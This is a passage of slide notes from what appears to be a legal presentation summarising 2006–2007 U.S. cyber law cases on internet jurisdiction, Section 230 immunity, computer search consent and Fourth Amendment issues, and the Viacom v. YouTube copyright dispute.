tortious act since the plaintiff's computer is located within New
York, and the content of plaintiff's Website originated from
plaintiff's computer in New York. Therefore, plaintiff argues, it is
"wholly immaterial" that the plaintiff's Website was hosted by a
Florida internet server.
Jurisdiction
Davidoff v. Davidoff, 2006 N.Y. Misc. LEXIS 1307 (NY
Sp Ct May 10, 2006)
The extent a court may exercise personal jurisdiction over a
nondomiciliary without violating the Due Process Clause of the
Constitution was defined in the Supreme Court's opinion in
International Shoe Co. v Washington (326 U.S. 310, 66 S. Ct.
154, 90 L. Ed. 95 [1945]). In order to subject a defendant to a
judgment in personam, "if he be not present within the territory of
the forum, he must have certain minimum contacts with the forum
state such that the "maintenance of the suit does not offend
traditional notions of fair play and substantial justice."
(International Shoe Co. v State of Wash., supra at 316;World-Wide
Volkswagen Corp. v Woodson, 444 U.S. 286, 100 S. Ct. 559, 62 L.
Ed. 2d 490 [1980]; see also Indosuez International Finance B.V. v
National Reserve Bank, 98 N.Y.2d 238, 774 N.E.2d 696, 746
N.Y.S.2d 631 [2002]).
Jurisdiction
Davidoff v. Davidoff, 2006 N.Y. Misc. LEXIS 1307 (NY
Sp Ct May 10, 2006)
The issue is whether this Court may exercise personal jurisdiction
over the defendants where defendants, though not physically
present in New York, allegedly commit tortious acts on an internet
website created by plaintiff, thereby injuring plaintiff in New York.
Plaintiff maintains that the defendants need not be physically
present in New York when committing their alleged tortious acts in
order to be subject to personal jurisdiction in New York .
Defendants maintain otherwise.
New York law is unsettled as to whether defendants' physical
presence in New York while committing the tortious act is a
prerequisite to jurisdiction.
Jurisdiction
Davidoff v. Davidoff, 2006 N.Y. Misc. LEXIS 1307 (NY
Sp Ct May 10, 2006)
Citing Banco Nacional Ultramarino v Chan, 169 Misc. 2d 182,
641 N.Y.S.2d 1006 [Supreme Court New York County 1996],
affirmed in, 240 A.D.2d 253, 659 N.Y.S.2d 734 [1st Dept 1997],
to allow a defendant to conspire and direct tortious activities in
New York, in furtherance of that conspiracy, and then avoid
jurisdiction because it directs those activities from outside the
State . . . , is to ignore the reality of modern banking and
computer technology in the end of the 20th century! A defendant
with access to computers, fax machines, etc., no longer has to
physically enter New York to perform a financial transaction
which may be . . . tortious, i.e., conversion. . . . The emphasis
should be on the locus of the tort, not whether defendant was
physically here when the tortious act occurred. Once the court
finds that the tort occurred within the State, it should look at the
totality of the circumstances, to determine if jurisdiction should
be exercised.
Jurisdiction
Davidoff v. Davidoff, 2006 N.Y. Misc. LEXIS 1307 (NY Sp Ct
May 10, 2006)
Although the alleged damage to plaintiff's information on the Website
was "felt" by plaintiff in New York, it is insufficient that the damages
were felt by plaintiff in New York. The relevant inquiry is whether a
tortious act occurred in New York. The act of damaging the Website at
best, occurred in Florida, where defendants were located when they
typed on their computer and accessed the Website's Hosting Company
in Florida. In the context of the internet, the content of plaintiff's
Website cannot be deemed to be located wherever the content may be
viewed, for jurisdictional purposes, as it has been held that the mere
fact that the posting appears on the website in every state will not give
rise to jurisdiction in every state (emphasis added) (see Seldon v Direct
Response Tech., 2004 U.S. Dist. LEXIS 5344 [SDNY 2004]).
The result may have been different if the defendants tapped into and
interfered with plaintiff's information located on a server or inside a
computer physically situated in New York. However, the server here is
located in Florida, and the alleged acts of the defendants never reached
beyond the bounds of Florida into New York.
McCague v. Trilogy Corp., 2007 WL 839921 (E.D. Pa.
Mar 15, 2007)
Defendant a charter boat company in Hawaii.
Two websites with emails to customer base, general
information and promotional material, allows reservation of
boat tours
Anthony McCague goes whale watching and has rough trip
Alleges fractured back and other injuries
Alleges negligently operated in rough seas.
Sues in Pennsylvania
Court holds- no personal or general jurisdiction over
Defendants
Jurisdiction
McCague v. Trilogy Corp., 2007 WL 839921 (E.D. Pa.
Mar 15, 2007)
Issue is whether Trilogy's websites, accessible in Pennsylvania,
constitute a continuous or systematic part of Trilogy's general
business sufficient to establish personal jurisdiction over it in
this district. There are no United States Supreme Court or
Third Circuit Court of Appeals cases deciding whether an
internet website can establish general personal jurisdiction
over a defendant. One district court has determined this by a
sliding scale: personal jurisdiction is proper if a website is
"interactive" but not if the website is passive. Molnlycke, 64
F.Supp. 2d at 451.
Trilogy’s websites are neither wholly passive nor interactive.
Trilogy’s websites do not specifically target Pennsylvanians.
Business from the websites is a minimal percentage.
Jurisdiction
Web Site as Doctor
Hageseth v Superior Court of San Mateo County, ---
Cal.Rptr.3d ----, 2007 WL 1464250, Cal.App. 1 Dist. (May
21, 2007)
June 2005, Stanford freshman, John McKay accessed an overseas
online pharmacy portal, USAnetrx.com, to obtain prescription drugs
"without the embarrassment of talking to a doctor." Unlike most
online pharmacies, this site did not require a faxed or mailed
prescription from a licensed pharmacist.
McKay ordered 90 capsules of Prozac after sending his credit
card information and some medical history through an online questionnaire.
Order routed through JRB Health Solutions, a Florida company.
Colorado physician Dr. Christian Hageseth, a JRB subcontractor,
authorized the prescription, without speaking to McKay.
A Mississippi-based pharmacy used by JRB filled the prescription
and sent the medication to McKay in California.
On August 2, 2005, intoxicated on alcohol and with Prozac in his
system, McKay, in an apparent suicide, died of carbon monoxide
poisoning.
Web Site as Doctor
Hageseth v Superior Court of San Mateo County, ---
Cal.Rptr.3d ----, 2007 WL 1464250, Cal.App. 1 Dist. (May
21, 2007)
San Mateo County District Attorney filed a criminal complaint
charging petitioner with the felony offense of practicing
medicine in California without a license in violation of section
2052 of the Business and Professions Code punishable by one
year confinement and a $10,000 fine
Question whether a defendant who was never himself
physically present in this state at any time during the
commission of the criminal offense with which he is charged,
and did not act through an agent ever present in this state, is
subject to the criminal jurisdiction of respondent court even
though no jurisdictional statute specifically extends the
extraterritorial jurisdiction of California courts for the
particular crime with which he is charged
Web Site as Doctor
Hageseth v Superior Court of San Mateo County, ---
Cal.Rptr.3d ----, 2007 WL 1464250, Cal.App. 1 Dist. (May
21, 2007)
Conduct consisted entirely of Internet-mediated communications
Petitioner was at all material times located in Colorado and never
directly communicated with anyone in California regarding the
prescription. His communications were only with JRB, from whom he
received McKay's online request for fluoxetine and questionnaire,
and to whom he sent the prescription he issued
Motion to dismiss for failure to state a crime (demurrer -
territorial jurisdiction)
Web Site as Doctor
Hageseth v Superior Court of San Mateo County, ---
Cal.Rptr.3d ----, 2007 WL 1464250, Cal.App. 1 Dist. (May
21, 2007)
When the commission of a public offense, commenced without the State, is
consummated within its boundaries by a defendant, himself outside the State,
through the intervention of an innocent or guilty agent or any other means
proceeding directly from said defendant, he is liable to punishment therefor in
this State in any competent court within the jurisdictional territory of which
the offense is committed.
A preponderance of the evidence shows that, without having at the time a
valid California medical license, petitioner prescribed fluoxetine for a person
he knew to be a California resident knowing that act would cause the
prescribed medication to be sent to that person at the California address he
provided. If the necessary facts can be proved at trial beyond a reasonable
doubt, the People will have satisfactorily shown a violation of Business and
Professional Code section 2052. It is enough for our purposes that a
preponderance of the evidence now shows that petitioner intended to produce
or could reasonably foresee that his act would produce, and he did produce,
the detrimental effect section 2052 was designed to prevent.
Search- Jurisdiction
In the Matter of the Search of Yahoo, Inc., 2007 WL 1539971
(D.Ariz May 21, 2007).
Court finds that 18 U.S.C. § 2703(a) authorizes a federal district
court, located in the district where the alleged crime occurred,
to issue search warrants for the production of electronically-
stored evidence located in another district. The warrant must
be issued in compliance with the procedures described in
FRCP 41. FRCP 41(b) however, does not limit the authority of
a district court to issue out-of-district warrants under § 2703(a)
because Rule 41(b) is not procedural in nature and, therefore,
does not apply to § 2703(a).
Court concludes that § 2703(a) authorizes an Arizona
magistrate judge to issue an out-of-district search warrant for
the contents of communications electronically-stored in
California when the alleged crime occurred in the District of
Arizona.
Web Based Software as Counsel
In re Reynoso, 477 F.3d 1117 (9th Cir. N.D. Cal. Feb.
27, 2007)
Website Bankruptcy Software Product
Held- Engaged in fraud and Unauthorized Practice of Law
Court found vendor qualified as a bankruptcy petition preparer, first
time that the Ninth Circuit had determined that a software-provider
could qualify as such
Services rendered must go beyond mere clerical preparation or
impersonal instruction on how to complete the forms
Several features of software and how it was presented to users
constituted the unauthorized practice of law.
Vendor – “offering legal expertise” “loopholes in the bankruptcy
code” "top-notch bankruptcy lawyer" "expert system."
Web Based Software as Counsel
In re Reynoso, 477 F.3d 1117 (9th Cir. N.D. Cal. Feb.
27, 2007)
More than mere clerical services. Software chose where to place the
user's information, selected which exemptions to claim, and
provided the legal citations to back everything up.
Court concluded this level of personal, although automated,
guidance amounted to the unauthorized practice of law.
Ninth Circuit specifically limited its holding to the facts of the case,
and gave no opinion whether software alone (i.e., without the
representations made on the web site) or different types of programs
would constitute an unauthorized legal practice.
The decision stands for the proposition that an overly expert
program, coupled with poorly chosen statements, can expose a
software vendor to claims of practicing law without a license
Web Pages & ISP
Universal Communication Systems, Inc. v. Lycos, Inc.,
--- F.3d ----, 2007 WL 549111, (1st Cir. Mass. February
23, 2007)
Plaintiffs UCS and its CEO brought suit, objecting to a series
of allegedly false and defamatory postings made under
pseudonymous screen names on an Internet message board
operated by Lycos, Inc
Communications Decency Act 47 U.S.C. § 230 - Congress
granted broad immunity to entities, such as Lycos, that
facilitate the speech of others on the Internet
Allegations of disparaging financial conditions; business
prospects; management integrity
230- No provider or user of an interactive computer service
shall be treated as the publisher or speaker of any information
provided by another information content provider
Web Pages & ISP
Fair Housing Council v Roommates.com, --- F.3d ----,
2007 WL 1412650 (9th Cir. C.D. Cal. May 15, 2007)
According to the CDA, no provider of an interactive computer service
shall be treated as the publisher or speaker of any information
provided by another information content provider. 47 U.S.C. § 230(c).
One of Congress’s goals in adopting this provision was to encourage
“the unfettered and unregulated development of free speech on the
Internet.” Batzel v. Smith, 333 F.3d 1018, 1027 (9th Cir. 2003)
Councils do not dispute that Roommate is a provider of an interactive
computer service. As such, Roommate is immune so long as it merely
publishes information provided by its members. However, Roommate
is not immune for publishing materials as to which it is an
“information content provider.” A content provider is “any person or
entity that is responsible, in whole or in part, for the creation or
development of information provided through the Internet.” 47 U.S.C.
§ 230(f)(3) (emphasis added). If Roommate is responsible, in whole or
in part, for creating or developing the information, it becomes a
content provider and is not entitled to CDA immunity.
Seizures
In re Forgione, 2006 Conn. Super. LEXIS 81 (January 6, 2006)
Petitioner family members filed a motion for the return of
unlawfully seized computer items under U.S. Const. amend. IV
and XIV and Conn. Const. art. I, §§ 7 and 8, as well as the
return of their seized internet subscriber information. They
further moved for a court order suppressing the use of the
computer items and the subscriber information as evidence in
any criminal proceedings involving any member of the family
A university student complained to the school's information
security officer that someone had interfered with the student's
university E-mail account. The officer determined the internet
protocol address from where the student's account was being
accessed and informed the police of his findings. The police
then obtained a search warrant to learn from an internet
service provider to whom that address belonged. Once the
police were informed that the address belonged to one of the
family members, they obtained a search warrant for the family
members' home
Seizures
In re Forgione, 2006 Conn. Super. LEXIS 81 (January 6, 2006)
The family members asserted that the searches and seizures
under the search warrants were improper.
The court found that, using the totality of the circumstances
test, there was an abundant basis, without the student's
statement to the officer about a breakup with a family member,
within the four corners of either search and seizure warrant
affidavits, to reasonably indicate to either warrant-issuing
judge that probable cause existed for issuance of the requested
orders. Further, the family members did not have an
expectation of privacy in the subscriber information, as it was
voluntarily divulged to the internet service provider
Computer Search
Third Party Consent
U.S. v. Rader, 65 M.J. 30 (U.S.C.C.A. May 04,
2007)
The question before us is whether Appellant's
roommate had sufficient access and control of
Appellant's computer to consent to the search
and seizure of certain unencrypted files in
Appellant's non-password-protected computer.
Joint Occupants - Accused's roommate had
sufficient access to and control over Accused's
computer to give valid consent to its search,
where the computer was located in roommate's
bedroom, it was not password protected,
accused never told roommate not to access
computer.
Computer Search
Third Party Consent
U.S. v. Buckner, 473 F.3d 551 (4th Cir. W.D. Vir. Jan 7,
2007)
Police Investigation of Michelle Buckner for fraud using AOL and
eBay accounts
Knock and talk, Michelle not home husband Frank is home, cops
ask Frank to have Michelle contact them
Michelle goes to police station says she knows nothing about the
fraud and that she leases the computer in her name and uses it
occasionally to play solitaire. Police re-visit Buckner household
next day
Michelle again agrees to cooperate fully telling officers take
whatever you want.
Computer on living room table, oral consent to seize, cops take PC
and mirror the hard drive
Frank indicted on 20 counts of wire fraud.
Frank motion to suppress and testifies access to his files requires a
password
Nothing in record indicates officers knew files were password
protected and their forensic analysis tool would not necessarily
detect passwords.
Computer Search
Third Party Consent
U.S. v. Buckner, 473 F.3d 551 (4th Cir. W.D. Vir. Jan 7,
2007)
No actual authority to consent
Common authority, mutual use
Michelle has apparent authority
Facts to officers, totality of circumstances, appear reasonable
Investigation focused on Michelle, PC in her name, no indication
files password protected; Frank told of investigation and does not
affirmatively states his files password protected
Cops cannot rely on apparent authority to search using a method to
intentionally avoid discovery of passwords or encryption protection
by user.
In this case they simply didn’t check for it.
U.S. v. Aaron, 2002 WL 511557 (6th Cir. April 3, 2002)
Girlfriend consents; no passwords
Computer Search
Third Party Consent
U.S. v. Andrus, 483 F.3d 711 (10th Cir. D. Kan. April
25, 2007)
Investigation of Regpay, a third-party billing and credit card
company that provides subscribers with access to websites
containing child pornography
Ray Andrus identified; records check gives house address;
Ray, Richard & Dr. Bailey Andrus
Email address provided to Regpay, [email protected]
Investigation focuses on Ray, but 8 months later not
enough for warrant so decide on knock and talk
Dr. Andrus answers door
So issue clearly becomes third party consent, sufficient
access and control yada, yada, yada
Computer Search
Third Party Consent
U.S. v. Andrus, 483 F.3d 711 (10th Cir. D. Kan. April 25,
2007)
Dr. Andrus answers door in pajamas
Dr. Andrus 91 years old (nothing said on faculties or frailty)
Dr. Andrus invites officers in
Informs officers Ray lives in center bedroom; did not pay rent;
living here to care for his elderly parents
Bedroom door open and in plain sight of officers; Dr.
Andrus states he has access to the bedroom, feels free to enter
when the door is open, but knocks when it is closed
Officer asks Dr for consent to search house and computers in
it, Dr agrees.
Computer Search
Third Party Consent
U.S. v. Andrus, 483 F.3d 711 (10th Cir. D. Kan.
April 25, 2007)
District Court determined Dr. Andrus’ consent was
voluntary, but lacked actual authority to consent to a
computer search. Dr. Andrus did not know how to use the
computer, had never used the computer, and did not know
the user name that would have allowed him to access the
computer. The district court then proceeded to consider
apparent authority. It indicated the resolution of the
apparent authority claim in favor of the government was a
“close call.”
Dr. Andrus' apparent authority to consent to a search of the
computer was reasonable until officers learned there was only one
computer. Because Cheatham instructed Kanatzar to suspend the
search at that point, there was no Fourth Amendment violation.
Computer Search
Third Party Consent
U.S. v. Andrus, 483 F.3d 711 (10th Cir. D. Kan. April
25, 2007)
District Court found apparent authority because:
(1) Email address [email protected] associated with Dr.
Bailey Andrus, used to register with Regpay and procure child
pornography;
(2) Dr. Andrus told the agents he paid the household’s internet
access bill;
(3) Agents knew several individuals lived in the household;
(4) Bedroom door not locked, leading a reasonable officer to
believe other members of the household could have had
access to it;
(5) Computer in plain view of anyone who entered the room
and appeared available for anyone’s use. Implicit in the district
court’s analysis is the assumption that officers could reasonably
believe Dr. Andrus accessed the internet through the computer in
the bedroom, giving Dr. Andrus the authority to consent to a
search of the computer.
Computer Search
Third Party Consent
U.S. v. Andrus, 483 F.3d 711 (10th Cir. D. Kan. April
25, 2007)
At Appellate level
Objects associated with high expectation of privacy include
valises, suitcases, footlockers, and strong boxes.
Case of first impression for 10th Circuit. Court notes
individual’s expectation of privacy in computers has been
likened to a suitcase or briefcase. U.S. v. Aaron, 2002 WL
511557 (6th Cir. April 3, 2002)
Password protected files compared to locked footlockers.
Trulock v. Freeh, 275 F.3d 391 (4th Cir. 2001)
For most people, their computers are their most private
spaces. People commonly talk about the bedroom as a very
private space, yet when they have parties, all the guests—
including perfect strangers —are invited to toss their coats on
the bed. But if one of those guests is caught exploring the
host’s computer, that will be his last invitation. United States v.
Gourde, 440 F.3d 1065, 1077 (9th Cir. 2006) (en banc)(Kleinfeld,
J., dissenting).
Computer Search
Third Party Consent
U.S. v. Andrus, 483 F.3d 711 (10th Cir. D. Kan. April
25, 2007)
Looking good for home team and locked computer
files, then-
To a reasonable officer, whether a computer or file is locked is
not apparent from visual inspection
Password protection or a locked file may only be discovered by
starting up the machine or attempting to access the file
Court acknowledges that EnCase allows user profiles
and passwords to be bypassed. Court fails to
acknowledge that it can also be set up to identify
passwords
Critical issue- whether LEA knows or reasonably
suspects computer is password protected
Computer Search
Third Party Consent
U.S. v. Andrus, 483 F.3d 711 (10th Cir. D. Kan. April
25, 2007)
Critical issue- whether LEA knows or reasonably suspects
computer is password protected
Computer in bedroom occupied by 51-year-old son
Dr. had unlimited or at-will access to the room (Court forgets that
when the door is closed the Dr. knocks and doesn’t simply go in)
No specific questions to this 91-year-old about his use of the PC,
but the Dr. said nothing indicating a need for such questions (shift
of burden here??)
Dr owned house and internet bill in his name (okay)
Email address his initials bandrus (iffy at best)
Defendant argument- PC was locked; cops would have known
if they had asked.
Court reply- officers are not obligated to ask questions unless
circumstances are ambiguous.
Court doesn’t feel password protection is so pervasive that
officers ought to know password protection is likely. Comments
that the dissent wants to take judicial notice of this fact.
Computer Search
Third Party Consent
U.S. v. Andrus, 483 F.3d 711 (10th Cir. D. Kan. April
25, 2007)
Finally-
Ray Andrus’ subsequent consent to search- Court holds it
voluntary
And lastly, being a former Gov’t Hack. . .
The “seen” lock argument. Pretty damn good cops that
can see if my footlocker or briefcase is locked if it is a
typical key system
EnCase easily configured to first check for users and
passwords
Computer Search
Revoking Consent
United States v. Ward, 576 F.2d 243 (9th Cir. 1978); Mason v. Pulliam,
557 F.2d 426 (5th Cir. 1977).
Both dealt with the revocation of consent concerning financial documents provided to the Internal
Revenue Service (IRS). In both cases, the taxpayers revoked consent to search financial
documents and the courts suppressed evidence taken from the records after consent had been
withdrawn. While these courts suppressed certain documents seized after consent was revoked,
neither court suppressed incriminating evidence discovered prior to the revocation.
Jones v. Berry, 722 F.2d 443 (9th Cir. 1983)
IRS agents received permission to search a residence and seized sixteen boxes of documents. On
that same day, after documents seized, defendant revoked consent and demanded the return of the
documents. The IRS refused to return the documents.
Ninth Circuit held documents properly seized prior to the revocation of consent were not taken in
violation of the fourth amendment. The holding requires only the suppression of evidence
discovered after the consent had been revoked.
No claim can be made that items seized in the course of a consent search, if found, must be
returned when consent is revoked. Such a rule would lead to the implausible result that
incriminating evidence seized in the course of a consent search could be retrieved by a revocation
of consent.
U.S. v. Andracek, 2007 WL 1575355 (E.D.Wis., May 30, 2007)
Defendant does not revoke consent in light of threat to subsequently
obtain a warrant. Still voluntary.
As for the agents' statements indicating that they would be requesting a warrant if
Andracek did not consent to the seizure of his computer, this can hardly be considered a
threat. This was a logical alternative if Andracek did not consent to the seizure of his
computer. Obtaining a warrant is adherence to the text of the Constitution, and in particular,
the Fourth Amendment. Under the attendant circumstances, the agent's statement to abide
by the Constitution and seek a warrant cannot be considered a threat.
Searches- Consent
U.S. v. Stierhoff, --- F.Supp.2d ----, 2007 WL 763984
(D. R.I. March 13, 2007)
Government exceeded scope of consent to
computer search given by defendant arrested for
stalking; while conducting the authorized search of the
"creative writing" file, authorities saw a reference to an
"offshore" file, which they opened without a
warrant, discovering evidence of tax evasion.
Defendant a stalker
Consents to search of computer and instructs police
officers that files are located in the D: drive, MyFiles directory,
Creative Writing folder.
$100,000+ in plain view, defendant admits he hasn’t paid
taxes in a while
Offshore folder on computer, officer looks at it
Search as to Offshore folder and derivative evidence
exceeded scope of consent
Searches- Consent
U.S. v. Dehghani, 2007 WL 710184 (W.D. Mo. March 06,
2007)
Police went to defendant's residence based upon an allegation of
child pornography and an associated screen name.
Request for consent to search computer
On-Site attempt to analyze fails
Permission to take off-site granted
Off-site forensics reveals evidence
Defendant argues that the police had no search warrant, they did
not specifically state that his computer would be searched or
seized, they failed to seize the 25-30 CDs lying next to the
computer, and failed to search another computer in the home.
It appears he may have believed the police would not have access
to the pornography on the computer because they did not have
defendant's passwords. However, defendant has offered no legal
authority for how his assumption, if indeed it existed, would
override his express voluntary consent to search his computer for
child pornography
Computer Search
Special Needs
United States v. Heckenkamp, --- F.3d ----, 2007 WL
1051579 (9th Cir. N.D. Cal. Apr 05, 2007)
Denial of motions to suppress evidence in a
prosecution for recklessly causing damage by
intentionally accessing a protected computer without
authorization are affirmed where: 1) although
defendant had a reasonable expectation of privacy in
his personal computer, a limited warrantless remote
search of the computer was justified under the
"special needs" exception to the warrant requirement;
and 2) a subsequent search of his dorm room was
justified, based on information obtained by means
independent of a university search of the room
Searches- Methods
U.S. v. Vilar, 2007 WL 1075041 (S.D.N.Y., Apr 04, 2007)
Warrant must state what materials are to be seized from the computer;
it need not specify how computers will be searched.
There is no case law holding an officer must justify the lack of a
search protocol in order to support issuance of the warrant.
Government not required to describe its specific search
methodology.
Warrant not defective because it did not include a computer
search methodology.
But see 3817 W. West End, 321 F. Supp. 2d at 960-62, requiring
that a computer search warrant include a search protocol
Supreme Court has held that it is generally left to the
discretion of the executing officers to determine the details of
how best to proceed with the performance of a search
authorized by warrant.
Computer Search
Work Place
U.S. v. Barrows, --- F.3d ----, 2007 WL 970165 (10th
Cir. W.D. Okla. Apr 03, 2007)
Does defendant possess a reasonable expectation of
privacy in the personal computer he brought to work,
placed on a common desk, and connected via the city
network to the common computer, sufficient to warrant
protection from a government search?
Focus on surrounding circumstances - (1) the employee's
relationship to the item seized; (2) whether the item was in
the immediate control of the employee when it was seized;
and (3) whether the employee took actions to maintain his
privacy in the item.
No password; left constantly in open area; and, knowingly
hooked PC up to network to share files
Computer Search
Private Search/Agent of Law Enforcement
U.S. v. Anderson, 2007 WL 1121319 (N.D. Ind., Apr
16, 2007)
Computer repair shop fixes computer, observes
numerous child pornography thumbnail images
Employees not agents of LEA, contracted to fix
operating system, opening files normal part of
checking to see if new installation of OS worked
When a private search has occurred, and the
government subsequently searches, whether the
Fourth Amendment is violated depends on the
degree to which the government's search
exceeds the scope of the private search.
Web Pages & ISP
Doe v. Mark Bates and Yahoo, Slip Copy, 2006 WL 3813758
(E.D.Tex. Dec. 27, 2006)
Yahoo not liable in civil case for child pornography online
group set up and moderated by a user on its servers.
User in jail
Civil suit targeted the ISP; Court ruled Section 230 immunity
applied, even though it was alleged Yahoo had broken the law by
hosting child porn.
No civil cases against site owners or hosting providers using
allegation of criminal conduct to get around Section 230. Law
intended to foster self-regulation of obscene and illegal
content by service providers, and immunity is an important
aspect of that.
Court - to allow suits on either basis (alleging criminal activity,
or that any level of regulation creates liability) would have a
chilling effect on online speech, which is something Congress
didn't want to do in enacting the law.
Copyright – The Complaint
Viacom International, Inc. v. YouTube, LLC and Google,
Inc., Civil Action No. 07 CV 2103 (S.D.N.Y. March 13,
2007)
YouTube has harnessed technology to willfully infringe
copyrights on a huge scale
YouTube’s brazen disregard of the intellectual property
laws
Defendants actively engage in, promote and induce this
infringement. YouTube itself publicly performs the
infringing videos…It is YouTube that knowingly
reproduces and publicly performs the copyrighted works
uploaded to its site.
..have done little to nothing to prevent this massive
infringement
Copyright – The Complaint
Viacom International, Inc. v. YouTube, LLC and Google,
Inc., Civil Action No. 07 CV 2103 (S.D.N.Y. March 13,
2007)
YouTube deliberately built up a library of infringing works
to draw traffic to the YouTube site
Because YouTube directly profits from the availability of
popular infringing works on its site, it has decided to shift
the burden entirely onto copyright owners to monitor the
YouTube site on a daily or hourly basis to detect infringing
videos and send notices to YouTube demanding that it
“take down” the infringing works.
In many instances the very same infringing video remains
on YouTube because it was uploaded by at least one other
user, or appears on YouTube again within hours of its
removal.
YouTube allows its users to make the hidden videos
available to others through YouTube features like the
“embed” “share” and “friends” functions
Copyright – The Complaint
Viacom International, Inc. v. YouTube, LLC and Google,
Inc., Civil Action No. 07 CV 2103 (S.D.N.Y. March 13,
2007)
YouTube has filled its library with entire episodes and
movies and significant segments of popular copyrighted
programming… When a user uploads a video, YouTube
copies the video in its software format, adds it to its own
servers, and makes it available for viewing on its own
website. A user who wants to view a video goes to the
YouTube site by typing www.youtube.com into the user’s
web browser, enters search terms into a search and
indexing function provided by YouTube for this purpose
on its site, and receives a list of thumbnails of videos in
the YouTube library matching those terms. YouTube
creates the thumbnails, which are individual frames from
videos in its library – including infringing videos – for the
purpose of helping users find what they are searching for.
Copyright – The Complaint
Viacom International, Inc. v. YouTube, LLC and Google,
Inc., Civil Action No. 07 CV 2103 (S.D.N.Y. March 13,
2007)
YouTube then publicly performs the chosen video by
sending streaming video content from YouTube’s servers
to the user’s computer… YouTube prominently displays its
logo, user interface, and advertising to the user. Thus the
YouTube conduct that forms the basis of this Complaint is
not simply providing storage space, conduits, or other
facilities to users who create their own websites with
infringing materials. To the contrary, YouTube itself
commits the infringing duplication, public performance
and public display of Plaintiff’s copyrighted works, and
that infringement occurs on YouTube’s own website, which
is operated and controlled by Defendants, not users.
Copyright – The Complaint
Viacom International, Inc. v. YouTube, LLC and Google,
Inc., Civil Action No. 07 CV 2103 (S.D.N.Y. March 13,
2007)
YouTube also allows any person to “embed” any video
available in the YouTube library into another website (such
as a blog, MySpace page, or any other page on the web
where the user can post material). … the user simply
copies the “embed” code, which YouTube supplies for
each video in its library, and then pastes that code into the
other website, where the embedded video will appear as a
television-shaped picture with the YouTube logo
prominently displayed… When a user clicks the play icon,
the embedded video plays within the context of the host
website, but it is actually YouTube, not the host site, that
publicly performs the video by transmitting the streaming
video content from YouTube’s own servers to the viewer’s
computer.
Copyright – The Complaint
Viacom International, Inc. v. YouTube, LLC and Google,
Inc., Civil Action No. 07 CV 2103 (S.D.N.Y. March 13,
2007)
Defendants have actual knowledge and clear notice of this
massive infringement, which is obvious to even the most casual
visitor to the site… YouTube has the right and ability to control
the massive infringement… YouTube has reserved to itself the
unilateral right to impose Terms of Use to which users must agree
… YouTube has the power and authority to police what occurs on
its premises… YouTube imposes a wide number of content-based
restrictions … reserves the unfettered right to block or remove
any video deemed inappropriate. YouTube proactively reviews and
removes pornographic videos.
Copyright – The Complaint
Viacom International, Inc. v. YouTube, LLC and Google,
Inc., Civil Action No. 07 CV 2103 (S.D.N.Y. March 13,
2007)
YouTube has failed to employ reasonable measures that
could substantially reduce or eliminate the massive amount
of copyright infringement… YouTube touts the availability
of purported copyright protection tools… these tools
prevent the upload of the exact same video…. However,
users routinely alter as little as a frame or two of a video
and repost it on YouTube.
Copyright
Viacom International, Inc. v. YouTube, LLC and Google,
Inc., Civil Action No. 07 CV 2103 (S.D.N.Y. March 13,
2007)
Count I – Direct Copyright Infringement – Public
performance
Count II – Direct Copyright Infringement – Public
Display
Count III – Direct Copyright Infringement –
Reproduction
Count IV – Inducement of Copyright Infringement
Count V – Contributory Copyright Infringement
Count VI – Vicarious Copyright Infringement
Copyright- The Answer
Viacom International, Inc. v. YouTube, LLC and Google, Inc.,
Civil Action No. 07 CV 2103 (S.D.N.Y. March 13, 2007)
Section 512 (safe harbor): hosting companies are not liable, as
long as they don't turn a blind eye to copyright infringement and
they remove infringing material when notified.
YouTube does the second part through a formal posted policy, and
it prohibits uploads of unauthorized videos more than 10 minutes
in length.
Google is confident that YouTube respects the legal rights of
copyright holders and predicts courts will agree. The safe harbor
applies only if the Web site does not financially benefit directly
from the alleged infringing work. Attorneys for Google said
Section 512 provides more than an ample shield, and that Web
hosting companies like YouTube and blogging services enjoy a
safe harbor.
Section 512 says Web site operators must not "receive a financial
benefit directly attributable to the infringing activity" and that they
must not be "aware of facts or circumstances from which infringing
activity is apparent."
Copyright- The Answer
Viacom International, Inc. v. YouTube, LLC and Google,
Inc., Civil Action No. 07 CV 2103 (S.D.N.Y. March 13,
2007)
Viacom’s complaint threatens the way hundreds of millions of
people legitimately exchange information, news,
entertainment, and political and artistic expression.
Google and YouTube comply with safe harbor obligations and
go well above and beyond what the law requires
Copyright
MGM Studios, Inc., v. Grokster, Ltd., 2005 U.S. LEXIS 5212 (U.S. June 27, 2005)
Petitioner copyright holders sued respondent software distributors, alleging
that the distributors were liable for copyright infringement because the
software of the distributors was intended to allow users to infringe
copyrighted works. Upon the grant of a writ of certiorari, the holders
appealed the judgment of the United States Court of Appeals for the Ninth
Circuit which affirmed summary judgment in favor of the distributors. The
distributors were aware that users employed their free software primarily to
download copyrighted files, but the distributors contended that they could
not be contributorily liable for the users' infringements since the software
was capable of substantial noninfringing uses such as downloading works in
the public domain. The U.S. Supreme Court unanimously held, however, that
the distributors could be liable for contributory infringement, regardless of
the software's lawful uses, based on evidence that the software was
distributed with the principal, if not exclusive, object of promoting its use to
infringe copyright. In addition to the distributors' knowledge of extensive
infringement, the distributors expressly communicated to users the ability of
the software to copy works and clearly expressed their intent to target
former users of a similar service which was being challenged in court for
facilitating copyright infringement. Further, the distributors made no
attempt to develop filtering tools or mechanisms to diminish infringing
activity, and the distributors' profit from advertisers clearly depended on
high-volume use which was known to be infringing. The judgment affirming
the grant of summary judgment to the distributors was vacated, and the case
was remanded for further proceedings.
Electronic Discovery
Cenveo Corp. v. Slater, 2007 WL 442387 (E.D. Pa.
Jan. 31, 2007)
Court – because of the close relationship between plaintiff's
claims and defendants' computer equipment, the court set out
a detailed three-step process:
Imaging
Plaintiff select computer expert, NDA Signed
Defendant’s computers available at business
Defendant may have expert present
Recovery
All files, including deleted
Notice to Defendants
Disclosure
Within 45 days comments on disclosure
2703(d) Orders
Warshak v. United States, --- F.3d ----, 2007 WL
1730094, (6th Cir. Ohio June 18, 2007)
Warshak v. United States, 2006 U.S. Dist. LEXIS
50076 (W.D. Ohio July 21, 2006)
2703(d) Orders
The district court correctly determined that e-mail users maintain a
reasonable expectation of privacy in the content of their e-mails, and the
injunctive relief crafted was largely appropriate; we find one modification
necessary. On remand,
the preliminary injunction should be modified to prohibit the United States
from seizing the contents of a personal e-mail account maintained by an
ISP in the name of any resident of the Southern District of Ohio, pursuant
to a court order issued under 2703(d), without either (1) providing the
relevant account holder or subscriber prior notice and an opportunity to be
heard, or (2) making a fact-specific showing that the account holder
maintained no expectation of privacy with respect to the ISP, in which case
only the ISP need be provided prior notice and an opportunity to be heard.
United States v. Adjani, 452 F.3d 1140 (9th Cir. Cal. July 11, 2006)
